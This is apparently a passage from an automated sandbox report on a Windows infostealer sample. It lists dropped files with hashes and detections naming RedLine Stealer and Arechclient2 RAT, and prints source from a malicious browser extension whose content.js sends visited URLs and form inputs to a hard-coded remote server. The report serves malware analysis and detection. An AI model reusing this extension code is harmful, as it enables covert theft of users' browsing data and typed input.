                                                                                                          MD5:EE7F11BEAF317EF7185B0CEC9A8CCFF4
                                                                                                          SHA1:274EBB8D1ADFA6D49E1D3FC85CF942357C8A7653
                                                                                                          SHA-256:6C2D0A8831E82FC3889E94EF3E986660E38175AE406FEA5A66E3D1F5C014EE97
                                                                                                          SHA-512:CDEEC3FBD4EFF63F64AAD6559C36654416AFAE5E7314DF1A756580DC52B6024C52F0F3803356B85D2095DFC136DE9234271A14EC843AF3CF3836B67BB30362B1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....b.........." ..........................@...................................................................... ...............0..........v................7...........P...'......................................................X.... .......................text...P........................... ..`.data...8s.......t..................@....bss........p...........................idata..v............V..............@....didata...... .......f..............@....edata.......0.......h..............@..@.rdata..F....@.......n..............@..@.reloc...'...P...(...p..............@..B.pdata...7.......8..................@..@.rsrc...............................@..@....................................@..@........................................

                                                                                                          C:\Users\user\AppData\Local\Temp\Bijouterie\ymv

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14675
                                                                                                          Entropy (8bit):6.3129340327989825
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:R+l02iZzxnnry2FDlVleoxhDrFdBT++7TO7:k9MNrZFJTZXDr5+QO7
                                                                                                          MD5:C40639E251F6F49D3F4C140CD1FC3D9C
                                                                                                          SHA1:7F531F2AD30F3BF2F637CEA7087F3E432CC54ADF
                                                                                                          SHA-256:2481D67EEEF5025767464E90969C913F198EAA8171F8EBB8E61CD92CA880293F
                                                                                                          SHA-512:D327399A1FB31203FD1B8AA991369DA907A4538BD77F69B0FC6568221CC3099300437D8E5F3F959C501FFCEF2E728971F33E2FCF0D453E96A84458A23ABB9480
                                                                                                          Malicious:false
                                                                                                          Preview:ICR.p....`v.g...Ik.....G.d....i.uvG..hnFB^.bh`YvC..xsw.U.Pu.`.fE..trZWq..d[..L....V.........KY..o.Fe.oI.qG.vogpy.aCo...bytk^....Aq..^.L^[a[B...e.wlSb.hXQxjYmA..V.VJs.JAM..P...t...a.Q.........]..L[iyrm...YM.e..s.W.d..sk...ba..e.......ne...Bu.o...D.USRWTt....b..nR..VH.....l.[.J.v..C.qq.].s.....`.Enwm...w.S..EbN.U...D..My.F..._m.CWD.DW..q.a.e....`.s.t...v.......JPw.bLsn....lM.J.X.....j....R...rA....D.U`..k.mr.br.....w.IhIi\...B..^...cL_\.........[.x.It....I...G.m....pVFqk...rreEc.LGZW...cH.CF..XI.p.bt..iC.PP.\q.HE.q]D....u..H...M..t....Ed..E].....udm....wdI...a.I....i...y.yU...n.e.P`..A.A..\..pS.P.vX...guv.F...U.U.dc.......c.d..W.lkP.gNkB.qW.u.j..c.iki...wj....Ly.xXj_....NGh.X......yj...FaT.j.\o.abgbExRX.NO....^LS\\.uS..rys.blbGVY..YdSA.q..QK.d...._Ys.KHKK........gqf.JP`tK.LYm..g....V.X.`gH\.^b...C.x.We.....L.E...v.Wp..A...Dx.h.Bd......x.JE.qxn......B.w]I..u.v..qa..NP.....L`LKNl[.C.QSN_...NA...O..k.r...V..vS...f.V.N...vh..p....p_q.g.Oqm...b.D..jGO...YcSW.hS[.r...`\YQ.P.^...QS..I.CYw.]k\o`

                                                                                                          C:\Users\user\AppData\Local\Temp\e290fca1

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):1518258
                                                                                                          Entropy (8bit):7.746381174325026
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:9Mf3uhVRb0kcazZn4rTR1fX7HY2ifxgdFmSj8:9Mf3u3c8ZnCnfLyww
                                                                                                          MD5:098E31F1952856FA436646CF624F069E
                                                                                                          SHA1:190F0BC3C03390CA7EEC232A5BEDD8C3095F1301
                                                                                                          SHA-256:9270CDA0A874C49FB563A1A4356F0C9D5C5864DF3C2378B08635D36B49690E57
                                                                                                          SHA-512:86B8C29A9E33E9F9E3C031DCE704A2D84D3EF76824E7798CB4A74A3B53CFE7092C7B323DE095D38509353D759CB5494881C1BEF5793831920800AD4EA7813067
                                                                                                          Malicious:false
                                                                                                          Preview:..i)..i)..i)..i)..i)/.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..h)..9yO.=h..$@h..Zd..u\..Md..uX..[..$Le.5yy..[j..uX..[...)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H. Gb..Hg..LN.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H.*[n..LB..]j..L..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i).. gO.;.W..Jy..Fm.GgN.5oy..L|..B..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)}.G.%.Y.9.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)

                                                                                                          C:\Users\user\AppData\Local\Temp\f566faf1

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):1518258
                                                                                                          Entropy (8bit):7.746381994270286
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:bMf3uhVRb0kcazZn4rTR1fX7HY2ifxgdFmSj8:bMf3u3c8ZnCnfLyww
                                                                                                          MD5:BF39D62A17689372545E0C5084DD693F
                                                                                                          SHA1:93E6F011B400CFBF590050ADF0BE5C35DEAF3AD3
                                                                                                          SHA-256:67479314DE118DCEF7BA956AAE8581E4B9744FEABD7B630D76091EAD440309AD
                                                                                                          SHA-512:3B8DC9AA9AE9BD922B73ECC7F0D4877F9F6327C8A510703548E4CBEB65515210D9039FF58671C8A1231A544136A12C95C90149012ECB494678747BC0710EA85C
                                                                                                          Malicious:false
                                                                                                          Preview:..i)..i)..i)..i)..i)/.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..h)..9yO.=h..$@h..Zd..u\..Md..uX..[..$Le.5yy..[j..uX..[...)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H. Gb..Hg..LN.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H.*[n..LB..]j..L..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i).. gO.;.W..Jy..Fm.GgN.5oy..L|..B..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)}.G.%.Y.9.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)

                                                                                                          C:\Users\user\AppData\Local\Temp\ihcsdpxxtwvodu

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 22 13:48:13 2024, mtime=Fri Nov 22 13:48:14 2024, atime=Fri Nov 22 01:14:50 2024, length=12606192, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):956
                                                                                                          Entropy (8bit):5.008644399166858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:8N12V92+meznW8Arc6mog3pIXuJMXuJtm:8N12VYjeznqrcDX3fJpJt
                                                                                                          MD5:140B10F5041A206F8469E18373E3F43E
                                                                                                          SHA1:2EB9E27AEF011B2BF95AD549664E10658AFCAE9D
                                                                                                          SHA-256:88D5DF548144EEA4DD6EE5CAA7CAF02188EC90A6111BFAF7C493A66F93074A40
                                                                                                          SHA-512:AAF8ABA74FEB441942C0A06682F6DD85707E06A76EC7ADE6F923AD97B63F222C53FBC8602F43E8984EC37A3F69B0B25F63CE2182796F92A06453DBF526A409A9
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F.... .......<......<...I8O.<...Z........................:..DG..Yr?.D..U..k0.&...&......Qg.*_.../..<.....$.<......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=vY.v..........................3*N.A.p.p.D.a.t.a...B.V.1.....vY.v..Roaming.@......EW.=vY.v............................F.R.o.a.m.i.n.g.....f.1.....vY.v..DOWNLO~1..N......vY.vvY.v..........................*...D.o.w.n.l.o.a.d.p.l.u.g.i.n.....`.2..Z..vY.. .Mp3tag.exe..F......vY.vvY.v..............................M.p.3.t.a.g...e.x.e.......k...............-.......j.............P......C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe..?.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.D.o.w.n.l.o.a.d.p.l.u.g.i.n.\.M.p.3.t.a.g...e.x.e.`.......X.......897506...........hT..CrF.f4... .../Tc...,......hT..CrF.f4... .../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                          C:\Users\user\AppData\Local\Temp\lcqqpedjyaav

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:modified
                                                                                                          Size (bytes):786944
                                                                                                          Entropy (8bit):6.809318515670792
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:LvsXZv8km0OHcbGbvzWHz0Hnquwxe+J0ssFWylkkoAbtEzNwfNqbYS2VbICKMIUo:0fPz0HynJ0ssFlSj1ma
                                                                                                          MD5:79950A37A83221C06D4BC355888ED9F1
                                                                                                          SHA1:B28A196AEA481F35216185A6B42D6204C7DBB574
                                                                                                          SHA-256:D5674FBE706D4AF45940F5CC48053DA790C011050AE9B82CDFBDFD27FAD40CFE
                                                                                                          SHA-512:CE0E454D5B3171B5623A74AD260F19E67A8431399DFC4FE7143199C88C029A61500D77ED8850A9FDBEA57EEC519D044B4331084701D37AAC95CF6078E5FAC83F
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, Author: Joe Security
                                                                                                          • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, Author: ditekSHen
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.S................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp14.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp25.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp3229.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp323A.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp323B.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp82AF.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.848598812124929
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                          MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                          SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                          SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                          SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmp98BC.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.848598812124929
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                          MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                          SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                          SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                          SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\tmpCE45.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20480
                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                          Malicious:false
                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:modified
                                                                                                          Size (bytes):786944
                                                                                                          Entropy (8bit):6.809318515670792
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:LvsXZv8km0OHcbGbvzWHz0Hnquwxe+J0ssFWylkkoAbtEzNwfNqbYS2VbICKMIUo:0fPz0HynJ0ssFlSj1ma
                                                                                                          MD5:79950A37A83221C06D4BC355888ED9F1
                                                                                                          SHA1:B28A196AEA481F35216185A6B42D6204C7DBB574
                                                                                                          SHA-256:D5674FBE706D4AF45940F5CC48053DA790C011050AE9B82CDFBDFD27FAD40CFE
                                                                                                          SHA-512:CE0E454D5B3171B5623A74AD260F19E67A8431399DFC4FE7143199C88C029A61500D77ED8850A9FDBEA57EEC519D044B4331084701D37AAC95CF6078E5FAC83F
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, Author: Joe Security
                                                                                                          • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, Author: ditekSHen
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.S................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

                                                                                                          C:\Users\user\AppData\Local\ksedtnorf\llg\background.js

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):596
                                                                                                          Entropy (8bit):4.089531522812482
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8/ACiDfZISRZLWxicmFGW8NkzCIzvWkE5rBQNFBajVDGwgI/:8ICi9IyLWxHyGWMjIzWccMFG
                                                                                                          MD5:AA0E77EC6B92F58452BB5577B9980E6F
                                                                                                          SHA1:237872F2B0C90E8CBE61EAA0E2919D6578CACD3F
                                                                                                          SHA-256:AAD1C9BE17F64D7700FEB2D38DF7DC7446A48BF001AE42095B59B11FD24DFCDE
                                                                                                          SHA-512:37366BD1E0A59036FE966F2E2FE3A0F7DCE6F11F2ED5BF7724AFB61EA5E8D3E01BDC514F0DEB3BEB6FEBFD8B4D08D45E4E729C23CC8F4CAE4F6D11F18FC39FA6
                                                                                                          Malicious:false
                                                                                                          Preview:.async function httpGet(theUrl).{. let response = await fetch(theUrl);. let user = await response.text();.. return user;.}..chrome.runtime.onMessage.addListener(. (request, sender, sendResponse) => {. if (request.message === "get"){. new Promise(async send => {. try{. var key = await httpGet(request.url);. // console.log("send");. send(key);. }catch(error){. send("null");. }.. }).then(sendResponse);. console.log("findl");. return true;. }. . }. );

                                                                                                          C:\Users\user\AppData\Local\ksedtnorf\llg\content.js

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1877
                                                                                                          Entropy (8bit):5.215940124745861
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kPG1iVUYRor51e0Ad7hR/NAGVqkh3vCI4dBoYCY+YCL:kPG1OU8thjvfC8
                                                                                                          MD5:6F2BAF34C8DD7F0DF91B91A31F9FD26A
                                                                                                          SHA1:6DB57150E15EB1F87C3ECA37FB572F3A53A8DCD0
                                                                                                          SHA-256:A908BD449E544AB23235B74ECA70A8DCA23DAE8961BC932307E5BD547A527834
                                                                                                          SHA-512:C754E9505896A6EBB17CF93B690345DF06EDA8F751089CD755165354E8FDE996A8F014DCE21A9325809D609188336AAA19E856649543D7304138396D722392B0
                                                                                                          Malicious:false
                                                                                                          Preview:var server = "http://45.141.87.55:9000/";.var iddd = 'ABEE5D020398559D1CCC81B5F72669AE';..var debug = 1;.var currLoc = "";..(async function () {...var clientId = iddd;..urlChangeAllert();.....spyjs_refreshEvents(clientId);...})()..function urlChangeAllert(){..try{...var loc = window.location;...getNoRet(server+'churl?pcid='+iddd+"&url="+loc);..}catch(error){ }...}..function spyjs_refreshEvents(clid){..if(currLoc != location.href){...currLoc=location.href;...spyjs_saveData("("+currLoc+")");..}..$('input').unbind('change');..$('input').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('select').unbind('change');..$('select').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('checkbox').unbind('change');..$('checkbox').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('button').unbind('change');..$('button').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});......$('textarea').unbind('change');..$('t

                                                                                                          C:\Users\user\AppData\Local\ksedtnorf\llg\icon.png

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
